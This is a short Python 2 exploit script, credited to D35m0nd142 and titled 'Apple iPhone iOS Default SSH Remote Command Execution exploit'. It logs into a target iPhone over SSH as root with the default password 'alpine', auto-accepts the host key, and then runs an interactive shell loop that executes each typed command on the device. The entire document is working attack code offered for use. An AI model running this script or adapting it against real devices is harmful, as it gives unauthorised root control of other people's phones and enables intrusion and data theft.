#!/usr/bin/python
# This software opens a simple shell where you can type commands to send and works without Metasploit 
# Exploit Title: Apple iPhone iOS Default SSH Remote Command Execution exploit
# Exploit Author: D35m0nd142
# Date: 17/02/2013
# Vendor Homepage: http://www.apple.com
# Screenshot: http://imageshack.us/photo/my-images/713/iphoneexploit.png/
# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium - Backbox
import paramiko  
import sys,time
import os
os.system("clear")
iphoneip = sys.argv[1]

print "=================================================================="
print "=      Apple iPhone iOS SSH Remote Command Execution exploit     ="
print "=                 Created by D35m0nd142                          ="
print "==================================================================\n" 

#def usage():
#	if len(sys.argv) != 2:
#		print "Usage: python exploit.py <iphone_ip> \n"
#		sys.exit(1)

def exploit(iphoneip,cmd):
	ssh = paramiko.SSHClient()
	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	ssh.connect(iphoneip,username='root',password='alpine')
	stdin, stdout, stderr = ssh.exec_command(cmd)
	resp = stdout.readlines()
	print resp	
	ssh.close()


#usage()
time.sleep(1.3)
cmd = " "
while (cmd != "quit"):
	try:
		cmd = raw_input("shell:~# ")
		exploit(iphoneip,cmd)
	except KeyboardInterrupt:
		print "\nExiting . . \n"
		sys.exit(1)